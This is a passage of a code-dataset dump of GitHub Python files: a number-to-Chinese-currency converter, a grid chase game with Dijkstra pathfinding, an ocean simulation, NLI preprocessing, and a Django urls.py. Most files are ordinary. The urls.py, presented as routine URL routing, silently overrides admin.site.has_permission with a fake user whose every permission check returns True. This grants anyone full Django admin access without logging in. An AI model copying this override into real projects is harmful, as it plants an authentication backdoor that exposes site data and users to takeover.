l_3.append(c)\n w = ''\n elif w != '零':\n l_3.append(c)\n w = c\n\n if l_3[-2] == '零':\n del l_3[-2]\n\n for i in range(len(l_3)):\n if l_3[i] == '亿' and l_3[i-1] == '零':\n del l_3[i-1]\n break\n\n return l_3\n\n\ndef run():\n s = input()\n if s == '0':\n print('零元整')\n else:\n print(''.join(zero(num(s))) + '元整')\n\n\nif __name__ == '__main__':\n run()\n\n","repo_name":"Jacken-Wu/CQU-python-2021","sub_path":"CQU-python-题库题参考答案/题库练习:字符串/编程题/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41690508499","text":"\"\"\"geodjango_test URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.views.generic import RedirectView\nclass AccessUser:\n has_module_perms = has_perm = __getattr__ = lambda s,*a,**kw: True\n\nadmin.site.has_permission = lambda r: setattr(r, 'user', AccessUser()) or True\n\n\nurlpatterns = [\n url(r'^admin/est/zona/$',RedirectView.as_view(url='/gps/adminzonas')),\n url(r'^admin/est/planta/$',RedirectView.as_view(url='/gps/adminplantas')),\n url(r'^admin/est/area/$',RedirectView.as_view(url='/gps/adminareas')),\n url(r'^admin/est/reportes/$',RedirectView.as_view(url='/gps/reportes')),\n url(r'^admin/', admin.site.urls),\n url(r'^chaining/', include('smart_selects.urls')),\n url(r'^gps/', include('gps.urls')),\n url(r'^est/', include('est.urls')),\n \n]\nurlpatterns += i18n_patterns(\n url(r'^admin/', include(admin.site.urls)),\n)\n#Comentar las lineas de abajo en produccion\nurlpatterns = urlpatterns + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nurlpatterns = urlpatterns + static(settings.STATIC_URL, documents_root=settings.STATIC_ROOT)\n","repo_name":"dsanchezkc/modulo-gps","sub_path":"project/workspace/staff_est/geodjango_test/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4434296331","text":"# https://www.codewars.com/kata/584dee06fe9c9aef810001e8\r\n\r\ndef green(n):\r\n if n==1:return n\r\n a,b,m,p=5,6,3,10\r\n while m= 0 and y >= 0:\n pos = (x + 1, y)\n if d == 'l' and x - 1 <= WIDTH - 1 and y <= HEIGHT - 1 and x - 1 >= 0 and y >= 0:\n pos = (x - 1, y)\n if d == 'u' and x <= WIDTH - 1 and y - 1 <= HEIGHT - 1 and x >= 0 and y - 1 >= 0:\n pos = (x, y - 1)\n if d == 'd' and x <= WIDTH - 1 and y + 1 <= HEIGHT - 1 and x >= 0 and y + 1 >= 0:\n pos = (x, y + 1)\n\n if pos not in self.walls:\n self.player = pos\n if (x, y) in self.goals:\n self.goals.remove((x, y))\n self.empty.append((x, y))\n self.score += 1\n\n def move_ghosts(self):\n for p, ghost in enumerate(self.ghosts):\n x = ghost[0]\n y = ghost[1]\n pos = (x, y)\n res = {}\n for i in range(0, self.width):\n for j in range(0, self.height):\n res[(i, j)] = []\n if (i + 1, j) not in self.walls and i + 1 < self.width:\n res[(i, j)].append((i + 1, j))\n if (i - 1, j) not in self.walls and i - 1 > -1:\n res[(i, j)].append((i - 1, j))\n if (i, j + 1) not in self.walls and j + 1 < self.height:\n res[(i, j)].append((i, j + 1))\n if (i, j - 1) not in self.walls and j - 1 > -1:\n res[(i, j)].append((i, j - 1))\n graph = res\n move = dijsktra(graph, pos, self.player)[1]\n d = ''\n if ghost[0] < move[0]:\n d = 'r'\n if ghost[0] > move[0]:\n d = 'l'\n if ghost[1] > move[1]:\n d = 'u'\n if ghost[1] < move[1]:\n d = 'd'\n if randint(0, 1) == 0:\n d = d\n else:\n d = choice(['r', 'l', 'u', 'd'])\n if d == 'r' and x + 1 <= WIDTH - 1 and y <= HEIGHT - 1 and x + 1 >= 0 and y >= 0:\n pos = (x + 1, y)\n if d == 'l' and x - 1 <= WIDTH - 1 and y <= HEIGHT - 1 and x - 1 >= 0 and y >= 0:\n pos = (x - 1, y)\n if d == 'u' and x <= WIDTH - 1 and y - 1 <= HEIGHT - 1 and x >= 0 and y - 1 >= 0:\n pos = (x, y - 1)\n if d == 'd' and x <= WIDTH - 1 and y + 1 <= HEIGHT - 1 and x >= 0 and y + 1 >= 0:\n pos = (x, y + 1)\n\n if pos not in self.walls:\n self.ghosts[p] = pos\n\ndef draw_grid(g, width=2):\n for y in range(g.height):\n for x in range(g.width):\n if (x, y) in g.walls:\n symbol = '#'\n elif (x, y) == g.player:\n symbol = '$'\n elif (x, y) in g.ghosts:\n symbol = 'G'\n elif (x, y) in g.goals:\n symbol = '.'\n elif (x, y) in g.empty:\n symbol = ' '\n print(\"%%-%ds\" % width % symbol, end=\"\")\n print()\n\n\ndef clear():\n subprocess.Popen(\"cls\" if platform.system() == \"Windows\" else \"clear\", shell=True)\n time.sleep(.1)\n\n\ndef create_graph(g: MapGrid):\n res = {}\n dangerous = []\n for ghost in g.ghosts:\n dangerous.append(ghost)\n dangerous.append((ghost[0] - 1, ghost[1]))\n dangerous.append((ghost[0] + 1, ghost[1]))\n dangerous.append((ghost[0], ghost[1] - 1))\n dangerous.append((ghost[0], ghost[1] + 1))\n for i in range(0, g.width):\n for j in range(0, g.height):\n res[(i, j)] = []\n if (i + 1, j) not in g.walls and i + 1 < g.width and (i + 1, j) not in dangerous:#:\n res[(i, j)].append((i + 1, j))\n if (i - 1, j) not in g.walls and i - 1 > -1 and (i - 1, j) not in dangerous:#:\n res[(i, j)].append((i - 1, j))\n if (i, j + 1) not in g.walls and j + 1 < g.height and (i, j + 1) not in dangerous:#:\n res[(i, j)].append((i, j + 1))\n if (i, j - 1) not in g.walls and j - 1 > -1 and (i, j - 1) not in dangerous:#:\n res[(i, j)].append((i, j - 1))\n return res\n\n\ndef dijsktra(graph, initial, end):\n shortest_paths = {initial: (None, 0)}\n current_node = initial\n visited = set()\n iterations = 0\n while current_node != end:\n iterations += 1\n visited.add(current_node)\n destinations = graph[current_node]\n weight_to_current_node = shortest_paths[current_node][1]\n\n for next_node in destinations:\n iterations += 1\n weight = 1 + weight_to_current_node\n if next_node not in shortest_paths:\n shortest_paths[next_node] = (current_node, weight)\n else:\n current_shortest_weight = shortest_paths[next_node][1]\n if current_shortest_weight > weight:\n shortest_paths[next_node] = (current_node, weight)\n\n next_destinations = {node: shortest_paths[node] for node in shortest_paths if node not in visited}\n if not next_destinations:\n return \"Route Not Possible\"\n # next node is the destination with the lowest weight\n current_node = min(next_destinations, key=lambda k: next_destinations[k][1])\n\n # Work back through destinations in shortest path\n path = []\n while current_node is not None:\n iterations += 1\n path.append(current_node)\n next_node = shortest_paths[current_node][0]\n current_node = next_node\n # Reverse path\n path = path[::-1]\n return path\n\n\ndef main():\n g = MapGrid()\n clear()\n draw_grid(g)\n while g.goals:\n # print('g.goals: ', g.goals)\n graph = create_graph(g)\n # print('graph: ', graph)\n target = choice(g.goals)\n # print('target: ', target)\n path = dijsktra(graph, g.player, target)\n # print('path: ', path)\n if path == \"Route Not Possible\":\n # print('AAAA')\n g.move_ghosts()\n clear()\n draw_grid(g)\n continue\n path = path[1:]\n # input()\n while path:\n d = ''\n if g.player[0] < path[0][0]:\n d = 'r'\n if g.player[0] > path[0][0]:\n d = 'l'\n if g.player[1] > path[0][1]:\n d = 'u'\n if g.player[1] < path[0][1]:\n d = 'd'\n g.move_player(d)\n g.move_ghosts()\n print()\n path = path[1:]\n clear()\n draw_grid(g)\n if g.player in g.ghosts:\n print('You lose!')\n print(\"Score: \", g.score)\n return\n time.sleep(0.1)\n graph = create_graph(g)\n path = dijsktra(graph, g.player, target)\n # print('path: ', path)\n if path == \"Route Not Possible\":\n # print('BBBB')\n target = choice(g.goals)\n graph = create_graph(g)\n path = dijsktra(graph, g.player, target)\n while path == \"Route Not Possible\":\n g.move_ghosts()\n clear()\n draw_grid(g)\n if g.player in g.ghosts:\n print('You lose!')\n print(\"Score: \", g.score)\n return\n graph = create_graph(g)\n path = dijsktra(graph, g.player, target)\n continue\n path = path[1:]\n if target == g.player and len(g.goals) == 1:\n break\n if target == g.player and len(g.goals) == 1:\n break\n print(\"You won!\")\n print(\"Score: \", g.score)\n\nif __name__ == '__main__':\n main()","repo_name":"ysavonik/IS3","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22859900445","text":"import csv\nfrom models.players import Player\n\ndef index_players(db_connection, path_to_player_file): \n cur = db_connection.cursor()\n with open(path_to_player_file, 'r' ) as f:\n reader = csv.DictReader(f)\n for line in reader:\n player = Player(line)\n cur.execute(\n \"INSERT INTO players VALUES (%s, %s, %s)\",\n (player.id, \n player.first_name, \n player.last_name)\n ) \n db_connection.commit()","repo_name":"rkredux/mlbanalytics","sub_path":"player_indexer.py","file_name":"player_indexer.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"10233016322","text":"import random\nfrom animals import FantomAnimal\nfrom animals import Plankton\nfrom animals import Killerwhale\nfrom animals import Shark\nfrom animals import Dolphin\nfrom living import Animals\nfrom living import AnimalsType\nimport string\n\n\nclass OceanController:\n def __init__(self, size: int):\n self.n: int = size\n\n def init(self, paramOcean: [[]], planktonNumber: int, dolphinNumber: int, sharkNumber: int, killerwhaleNumber: int) -> None:\n for i in range(0, self.n):\n for j in range(0, self.n):\n paramOcean[i][j] = FantomAnimal(i, j)\n\n x = random.randrange(1, self.n)\n y = random.randrange(1, self.n)\n for i in range(0, planktonNumber + 1):\n while paramOcean[x][y].getType() != AnimalsType.EMPTY:\n x = random.randrange(1, self.n)\n y = random.randrange(1, self.n)\n paramOcean[x][y] = Plankton(x, y, 2, 0)\n for i in range(0, dolphinNumber + 1):\n while paramOcean[x][y].getType() != AnimalsType.EMPTY:\n x = random.randrange(1, self.n)\n y = random.randrange(1, self.n)\n paramOcean[x][y] = Dolphin(x, y, 4, True, 0)\n for i in range(0, sharkNumber + 1):\n while paramOcean[x][y].getType() != AnimalsType.EMPTY:\n x = random.randrange(1, self.n)\n y = random.randrange(1, self.n)\n paramOcean[x][y] = Shark(x, y, 5, True, 0)\n for i in range(0, killerwhaleNumber + 1):\n while paramOcean[x][y].getType() != AnimalsType.EMPTY:\n x = random.randrange(1, self.n)\n y = random.randrange(1, self.n)\n paramOcean[x][y] = Killerwhale(x, y, 6, True, 0)\n\n def update(self, paramOcean: [[]]) -> None:\n for i in range(1, self.n - 1):\n for j in range(1, self.n - 1):\n tempOcean = paramOcean[i][j].next(paramOcean)\n if tempOcean:\n for h in tempOcean:\n paramOcean[h.getX()][h.getY()] = h\n\n def deleteOcean(self, paramOcean: []) -> None:\n for i in range(1, self.n - 1):\n for j in range(1, self.n - 1):\n paramOcean[i][j] = None\n\n def showOcean(self, paramOcean: []) -> None:\n for i in range(1, self.n - 1):\n for j in range(1, self.n - 1):\n if paramOcean[i][j].getType() == AnimalsType.EMPTY:\n print(\"E\", end=\" \")\n if paramOcean[i][j].getType() == AnimalsType.PLANKTON:\n print(\"P\", end=\" \")\n if paramOcean[i][j].getType() == AnimalsType.DOLPHIN:\n print(\"D\", end=\" \")\n if paramOcean[i][j].getType() == AnimalsType.SHARK:\n print(\"S\", end=\" \")\n if paramOcean[i][j].getType() == AnimalsType.KILLERWHALE:\n print(\"K\", end=\" \")\n print()\n\n def getSizeOfTheOcean(self) -> int:\n return self.n\n\n def setSizeOfTheOcean(self, size: int) -> None:\n self.n = size\n\n def addAnimal(self, ocean: [[]]) -> None:\n print(\"p - plankton\")\n print(\"d - dolphin\")\n print(\"s - shark\")\n print(\"k - killerwhale\")\n choice = str(input())\n males = [\"male\", \"female\"]\n if choice == \"p\":\n x = int(input(\"input x \"))\n while x < 1 or x > self.n - 2:\n x = int(input(\"try more \"))\n y = int(input(\"input y \"))\n while y < 1 or y > self.n - 2:\n y = int(input(\"try more \"))\n hp = int(input(\"input hp \"))\n while hp < 1 or hp > 2:\n hp = int(input(\"try more \"))\n age = int(input(\"input age \"))\n while age < 1 or age > 2:\n age = int(input(\"try more \"))\n ocean[x][y] = Plankton(x, y, hp, age)\n return\n if choice == \"d\":\n x = int(input(\"input x \"))\n while x < 1 or x > self.n - 2:\n x = int(input(\"try more \"))\n y = int(input(\"input y \"))\n while y < 1 or y > self.n - 2:\n y = int(input(\"try more \"))\n hp = int(input(\"input hp \"))\n while hp < 1 or hp > 4:\n hp = int(input(\"try more \"))\n male = str(input(\"input male \"))\n while not male in males:\n male = str(input(\"try more \"))\n age = int(input(\"input age \"))\n while age < 1 or age > 4:\n age = int(input(\"try more \"))\n ocean[x][y] = Dolphin(x, y, hp, male, age)\n return\n if choice == \"s\":\n x = int(input(\"input x \"))\n while x < 1 or x > self.n - 2:\n x = int(input(\"try more \"))\n y = int(input(\"input y \"))\n while y < 1 or y > self.n - 2:\n y = int(input(\"try more \"))\n hp = int(input(\"input hp \"))\n while hp < 1 or hp > 5:\n hp = int(input(\"try more \"))\n male = str(input(\"input male \"))\n while not male in males:\n male = str(input(\"try more \"))\n age = int(input(\"input age \"))\n while age < 1 or age > 5:\n age = int(input(\"try more \"))\n ocean[x][y] = Shark(x, y, hp, male, age)\n\n return\n if choice == \"k\":\n x = int(input(\"input x \"))\n while x < 1 or x > self.n - 2:\n x = int(input(\"try more \"))\n y = int(input(\"input y \"))\n while y < 1 or y > self.n - 2:\n y = int(input(\"try more \"))\n hp = int(input(\"input hp \"))\n while hp < 1 or hp > 6:\n hp = int(input(\"try more \"))\n male = str(input(\"input male \"))\n while not male in males:\n male = str(input(\"try more \"))\n age = int(input(\"input age \"))\n while age < 1 or age > 6:\n age = int(input(\"try more \"))\n ocean[x][y] = Killerwhale(x, y, hp, male, age)\n return\n print(\"invalid letter\")\n def killAnimal(self, ocean:[]) -> None:\n x = int(input(\"input x \"))\n while x < 1 or x > self.n - 2:\n x = int(input(\"try more \"))\n y = int(input(\"input y \"))\n while y < 1 or y > self.n - 2:\n y = int(input(\"try more \"))\n ocean[x][y] = FantomAnimal(x, y)\n","repo_name":"Faceless1337/Ocean","sub_path":"oceanController.py","file_name":"oceanController.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41303877459","text":"\nnum=[5, 2, 6, 3, 4]\n\nlen= len(num)\n\nfor i in range(len-1):\n min=i\n for j in range(i+1,len):\n if num[j] < num[min] :\n min = j\n if min != i:\n temp=num[i]\n num[i]=num[min]\n num[min]=temp;\nprint(num)\n\n\n\n","repo_name":"MasudurRahman34/problem-solving","sub_path":"dsa/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72712344742","text":"import os\nimport matplotlib.pyplot as plt\noutput_path = './experiments'\nimport torch\nimport numpy as np\n\ndef read(dir):\n topk=[]\n file_path = os.path.join(output_path,dir)\n with open(file_path,'r') as f:\n for line in f.readlines():\n topk.append(float(line.split('\\n')[0]))\n return topk\n\nif __name__ == '__main__':\n # max = 'result_max.txt'\n # mean = 'result_mean.txt'\n # topk = 'result_topkmean.txt'\n #\n # max_data = read(max)\n # mean_data = read(mean)\n # topk_data = read(topk)\n # topk_data = topk_data[:-1]\n #\n # i = range(800)\n # plt.figure()\n # plt.plot(i,max_data,'r',i,mean_data,'y',i,topk_data,'b')\n # plt.show()\n # a = torch.arange(0,12).view(3,4)\n # print(a)\n #\n # index = torch.nonzero(a)\n #\n # index = index.transpose(-1,-2)\n # c = torch.Tensor([0.3,0.5,0.8])\n # print((c>0.3).type_as(a))\n # d = torch.Tensor([0.1,0.8,0.1])\n # print(torch.where(c>0.3,1.0,0.2))\n # print(torch.mean(c))\n d = torch.rand(2,3,3)\n d_norm = torch.norm(d,p=2, dim =-1,keepdim=True)\n d_n = torch.div(d,d_norm)\n # print(torch.matmul(d_n,d_n.transpose(-1,-2)))\n import torch.nn as nn\n projection = nn.Linear(3,1)\n c = torch.arange(0,12).view(3,4)\n c = torch.unsqueeze(c,0)\n c = c.repeat(2,1,1)\n print(c)\n\n c_max, c_id = torch.max(c,-1)\n d = c.sum(-2)\n e = torch.arange(0,c_max.size(0)).view(-1,1).repeat(1,c_max.size(1))\n print(d[e,c_id]+c_max)\n #print(c_id)\n","repo_name":"hhhhhpy/bgf-generation","sub_path":"exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11077880759","text":"\"\"\"\nPreprocess some NLI dataset and word embeddings to be used by the ESIM model.\n\"\"\"\n# Aurelien Coet, 2018.\n\nimport os\nimport pickle\nimport string\nimport fnmatch\nimport json\nimport ipdb\nimport numpy as np\nfrom collections import Counter\n\n\ndef read_data(filepath, lowercase=False, ignore_punctuation=False):\n \"\"\"\n Read the premises, hypotheses and labels from a file in some NLI\n dataset and return them in a dictionary.\n\n Args:\n filepath: The path to a file containing some premises, hypotheses\n and labels that must be read. The file should be formatted in\n the same way as the SNLI (or MultiNLI) dataset.\n lowercase: Boolean value indicating whether the words in the premises\n and hypotheses must be lowercased.\n ignore_punctuation: Boolean value indicating whether to ignore\n punctuation in the premises and hypotheses.\n\n Returns:\n A dictionary containing three lists, one for the premises, one for the\n hypotheses, and one for the labels in the input data.\n \"\"\"\n with open(filepath, 'r') as input_data:\n premises, hypotheses, labels = [], [], []\n\n # Translation tables to remove parentheses and punctuation from\n # strings.\n parentheses_table = str.maketrans({'(': None, ')': None})\n punct_table = str.maketrans({key: ' ' for key in string.punctuation})\n\n # Ignore the headers on the first line of the file.\n next(input_data)\n\n for line in input_data:\n line = line.strip().split('\\t')\n\n # Ignore sentences that have no gold label.\n if line[0] == '-':\n continue\n\n premise = line[1]\n hypothesis = line[2]\n\n # Remove '(' and ')' from the premises and hypotheses.\n premise = premise.translate(parentheses_table)\n hypothesis = hypothesis.translate(parentheses_table)\n\n if lowercase:\n premise = premise.lower()\n hypothesis = hypothesis.lower()\n\n if ignore_punctuation:\n premise = premise.translate(punct_table)\n hypothesis = hypothesis.translate(punct_table)\n\n # Each premise and hypothesis is split into a list of words.\n premises.append(premise.rstrip().split())\n hypotheses.append(hypothesis.rstrip().split())\n labels.append(line[0])\n\n return {\"premises\": premises,\n \"hypotheses\": hypotheses,\n \"labels\": labels}\n\n\ndef read_data_sogou(filepath, **kwargs):\n premises, hypotheses, labels = [], [], []\n with open(filepath) as fin:\n for line in fin:\n data = json.loads(line)\n premises.append(data['passage'])\n hypotheses.append(data['question'])\n labels.append(data['label'])\n return {\"premises\": premises,\n \"hypotheses\": hypotheses,\n \"labels\": labels}\n\n\ndef build_worddict(data, num_words=None):\n \"\"\"\n Build a dictionary associating words from a set of premises and\n hypotheses to unique integer indices.\n Update: we put the most common word in hypotheses\n\n Args:\n data: A dictionary containing the premises and hypotheses for which\n a worddict must be built. The dictionary is assumed to have the\n same form as the dicts built by the 'read_data' function of this\n module.\n num_words: Integer indicating the maximum number of words to\n keep in the worddict. If specified, only the 'num_words' most\n frequent words will be kept. If set to None, all words are\n kept. Defaults to None.\n\n Returns:\n A dictionary associating words to integer indices.\n \"\"\"\n words = []\n [words.extend(sentence) for sentence in data['hypotheses']]\n counts = Counter(words)\n if num_words is None:\n num_words = len(counts)\n\n worddict = {word[0]: i+4\n for i, word in enumerate(counts.most_common(num_words))}\n\n worddict[\"_PAD_\"] = 0\n worddict[\"_OOV_\"] = 1\n worddict[\"_BOS_\"] = 2\n worddict[\"_EOS_\"] = 3\n #open('tmp_question_word.pkl', 'w').write(json.dumps(worddict))\n\n # Special indices are used for padding, out-of-vocabulary words, and\n # beginning and end of sentence tokens.\n [words.extend(sentence) for sentence in data['premises']]\n counts = Counter(words)\n num_words = len(counts)\n for word, v in counts.most_common(num_words):\n if word not in worddict:\n worddict[word] = len(worddict)\n\n return worddict\n\n\ndef words_to_indices(sentence, worddict):\n \"\"\"\n Transform the words in a sentence to integer indices.\n\n Args:\n sentence: A list of words that must be transformed to indices.\n worddict: A dictionary associating words to indices.\n\n Returns:\n A list of indices.\n \"\"\"\n # Include the beggining of sentence token at the start of the sentence.\n indices = [worddict[\"_BOS_\"]]\n for word in sentence:\n if word in worddict:\n index = worddict[word]\n else:\n # Words absent from 'worddict' are treated as a special\n # out-of-vocabulary word (OOV).\n index = worddict['_OOV_']\n indices.append(index)\n # Add the end of sentence token at the end of the sentence.\n indices.append(worddict[\"_EOS_\"])\n\n return indices\n\n\ndef transform_to_indices(data, worddict, labeldict):\n \"\"\"\n Transform the words in the premises and hypotheses of a dataset, as well\n as their associated labels, to integer indices.\n\n Args:\n data: A dictionary containing lists of premises, hypotheses\n and labels.\n worddict: A dictionary associating words to unique integer indices.\n labeldict: A dictionary associating labels to unique integer indices.\n\n Returns:\n A dictionary containing the transformed premises, hypotheses and\n labels.\n \"\"\"\n transformed_data = {\"premises\": [], \"hypotheses\": [], \"labels\": []}\n\n for i, premise in enumerate(data['premises']):\n # Ignore sentences that have a label for which no index was\n # defined in 'labeldict'.\n label = data[\"labels\"][i]\n if label not in labeldict:\n print('error label')\n continue\n\n transformed_data[\"labels\"].append(labeldict[label])\n\n indices = words_to_indices(premise, worddict)\n transformed_data[\"premises\"].append(indices)\n\n indices = words_to_indices(data[\"hypotheses\"][i], worddict)\n transformed_data[\"hypotheses\"].append(indices)\n\n return transformed_data\n\n\ndef build_embedding_matrix(worddict, embeddings_file):\n \"\"\"\n Build an embedding matrix with pretrained weights for a given worddict.\n\n Args:\n worddict: A dictionary associating words to unique integer indices.\n embeddings_file: A file containing pretrained word embeddings.\n\n Returns:\n A numpy matrix of size (num_words+4, embedding_dim) containing\n pretrained word embeddings (the +4 is for the padding, BOS, EOS and\n out-of-vocabulary tokens).\n \"\"\"\n # Load the word embeddings in a dictionnary.\n embeddings = {}\n seen_word = 0\n with open(embeddings_file, 'r', errors=\"ignore\") as input_data:\n for line in input_data:\n line = line.rstrip().split(' ')\n\n try:\n # Check that the second element on the line is the start\n # of the embedding and not another word. Necessary to\n # ignore multiple word lines.\n float(line[1])\n word = line[0]\n if word in worddict:\n embeddings[word] = line[1:]\n\n # Ignore lines corresponding to multiple words separated\n # by spaces.\n except ValueError:\n print('error')\n continue\n\n num_words = len(worddict)\n embedding_dim = len(list(embeddings.values())[0])\n embedding_matrix = np.zeros((num_words, embedding_dim))\n print('num_words: %s, emb_dim: %s' % (num_words, embedding_dim))\n # Actual building of the embedding matrix.\n for word, i in worddict.items():\n if word in embeddings:\n seen_word += 1\n embedding_matrix[i] = np.array(embeddings[word], dtype=float)\n else:\n if word == \"_PAD_\":\n continue\n # Out of vocabulary words are initialised with random gaussian\n # samples.\n embedding_matrix[i] = np.random.normal(size=(embedding_dim))\n print('share words: %s' % seen_word)\n return embedding_matrix\n\n\ndef preprocess_NLI_data(inputdir,\n embeddings_file,\n targetdir,\n lowercase=False,\n ignore_punctuation=False,\n num_words=None,\n datatype='NLI'):\n \"\"\"\n Preprocess the data from some NLI corpus so it can be used by the\n ESIM model.\n Compute a worddict from the train set, and transform the words in\n the sentences of the corpus to their indices, as well as the labels.\n Build an embedding matrix from pretrained word vectors.\n The preprocessed data is saved in pickled form in some target directory.\n\n Args:\n inputdir: The path to the directory containing the NLI corpus.\n embeddings_file: The path to the file containing the pretrained\n word vectors that must be used to build the embedding matrix.\n targetdir: The path to the directory where the preprocessed data\n must be saved.\n lowercase: Boolean value indicating whether to lowercase the premises\n and hypotheseses in the input data. Defautls to False.\n ignore_punctuation: Boolean value indicating whether to remove\n punctuation from the input data. Defaults to False.\n num_words: Integer value indicating the size of the vocabulary to use\n for the word embeddings. If set to None, all words are kept.\n Defaults to None.\n \"\"\"\n if not os.path.exists(targetdir):\n os.makedirs(targetdir)\n\n # Retrieve the train, dev and test data files from the dataset directory.\n train_file = \"\"\n dev_file = \"\"\n test_file = \"\"\n for file in os.listdir(inputdir):\n print(file)\n if fnmatch.fnmatch(file, '*-train.*'):\n train_file = file\n elif fnmatch.fnmatch(file, '*-dev.*'):\n dev_file = file\n elif fnmatch.fnmatch(file, '*-test.*'):\n test_file = file\n\n # -------------------- Train data preprocessing -------------------- #\n print(20*\"=\", \" Preprocessing train set \", 20*\"=\")\n print(\"\\t* Reading data...\")\n if datatype == \"NLI\":\n data = read_data(os.path.join(inputdir, train_file),\n lowercase=lowercase,\n ignore_punctuation=ignore_punctuation)\n elif datatype == 'Sogou':\n data = read_data_sogou(os.path.join(inputdir, train_file),\n lowercase=False,\n ignore_punctuation=False\n )\n else:\n raise NotImplementedError\n print(\"\\t* Computing worddict and saving it...\")\n worddict = build_worddict(data, num_words=num_words)\n with open(os.path.join(targetdir, \"worddict.pkl\"), 'wb') as pkl_file:\n pickle.dump(worddict, pkl_file)\n\n print(\"\\t* Transforming words in premises and hypotheses to indices...\")\n if datatype == 'NLI':\n labeldict = {\"entailment\": 0, \"neutral\": 1, \"contradiction\": 2}\n elif datatype == 'Sogou':\n labeldict = {0: 0, 1: 1}\n else:\n raise NotImplementedError\n\n transformed_data = transform_to_indices(data, worddict, labeldict)\n print(len(transformed_data))\n print(\"\\t* Saving result...\")\n with open(os.path.join(targetdir, \"train_data.pkl\"), 'wb') as pkl_file:\n pickle.dump(transformed_data, pkl_file)\n\n # -------------------- Validation data preprocessing -------------------- #\n print(20*\"=\", \" Preprocessing dev set \", 20*\"=\")\n print(\"\\t* Reading data...\")\n if datatype == \"NLI\":\n data = read_data(os.path.join(inputdir, dev_file),\n lowercase=lowercase,\n ignore_punctuation=ignore_punctuation)\n elif datatype == 'Sogou':\n data = read_data_sogou(os.path.join(inputdir, dev_file),\n lowercase=False,\n ignore_punctuation=False\n )\n else:\n raise NotImplementedError\n\n print(\"\\t* Transforming words in premises and hypotheses to indices...\")\n transformed_data = transform_to_indices(data, worddict, labeldict)\n print(\"\\t* Saving result...\")\n with open(os.path.join(targetdir, \"dev_data.pkl\"), 'wb') as pkl_file:\n pickle.dump(transformed_data, pkl_file)\n\n # -------------------- Test data preprocessing -------------------- #\n print(20*\"=\", \" Preprocessing test set \", 20*\"=\")\n print(\"\\t* Reading data...\")\n\n if datatype == \"NLI\":\n data = read_data(os.path.join(inputdir, test_file),\n lowercase=lowercase,\n ignore_punctuation=ignore_punctuation)\n elif datatype == 'Sogou':\n data = read_data_sogou(os.path.join(inputdir, test_file),\n lowercase=False,\n ignore_punctuation=False\n )\n else:\n raise NotImplementedError\n\n print(\"\\t* Transforming words in premises and hypotheses to indices...\")\n transformed_data = transform_to_indices(data, worddict, labeldict)\n print(\"\\t* Saving result...\")\n with open(os.path.join(targetdir, \"test_data.pkl\"), 'wb') as pkl_file:\n pickle.dump(transformed_data, pkl_file)\n\n # -------------------- Embeddings preprocessing -------------------- #\n print(20*\"=\", \" Preprocessing embeddings \", 20*\"=\")\n print(\"\\t* Building embedding matrix and saving it...\")\n embed_matrix = build_embedding_matrix(worddict, embeddings_file)\n with open(os.path.join(targetdir, \"embeddings.pkl\"), 'wb') as pkl_file:\n pickle.dump(embed_matrix, pkl_file)\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description='Preprocess an NLI dataset')\n parser.add_argument('--config',\n default=\"../config/preprocessing.json\",\n help='Path to a configuration file for preprocessing')\n args = parser.parse_args()\n\n with open(os.path.normpath(args.config), 'r') as cfg_file:\n config = json.load(cfg_file)\n\n preprocess_NLI_data(os.path.normpath(config[\"data_dir\"]),\n os.path.normpath(config[\"embeddings_file\"]),\n os.path.normpath(config[\"target_dir\"]),\n lowercase=config[\"lowercase\"],\n ignore_punctuation=config[\"ignore_punctuation\"],\n num_words=config[\"num_words\"],\n datatype=config.get('datatype', 'NLI')\n )\n","repo_name":"lixinsu/ESIM","sub_path":"scripts/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":15174,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"39391349356","text":"from Pages.pageObjects.Common_Buss import CommonBus\nfrom Pages.pageLocators.square_locators import SquareLocators as squareloc\nfrom Common.log import get_logger\nimport time, random\nfrom Pages.pageObjects.sign_pop_page import SignPopPage\nfrom Pages.pageLocators.room_locators import RoomPageLocator as roomloc\nfrom Pages.pageLocators.my_locators import MyLocators as myloc\nfrom Pages.pageObjects.room_page import RoomPage\n\n'''设置-页面操作行为'''\nlog = get_logger(logger_name=\"广场操作日志\")\n\nclass SquarePage(CommonBus):\n '''广场模块'''\n def __init__(self, driver):\n self.driver = driver\n self.popPage = SignPopPage(self.driver)\n self.roomPage = RoomPage(self.driver)\n \n '''\n 附近动态流程\n '''\n def nearby_dynamics(self):\n self.wait_click_element(squareloc.square_module,model=\"广场模块\")\n self.wait_click_element(squareloc.square_attention,model=\"点击关注tap\")\n 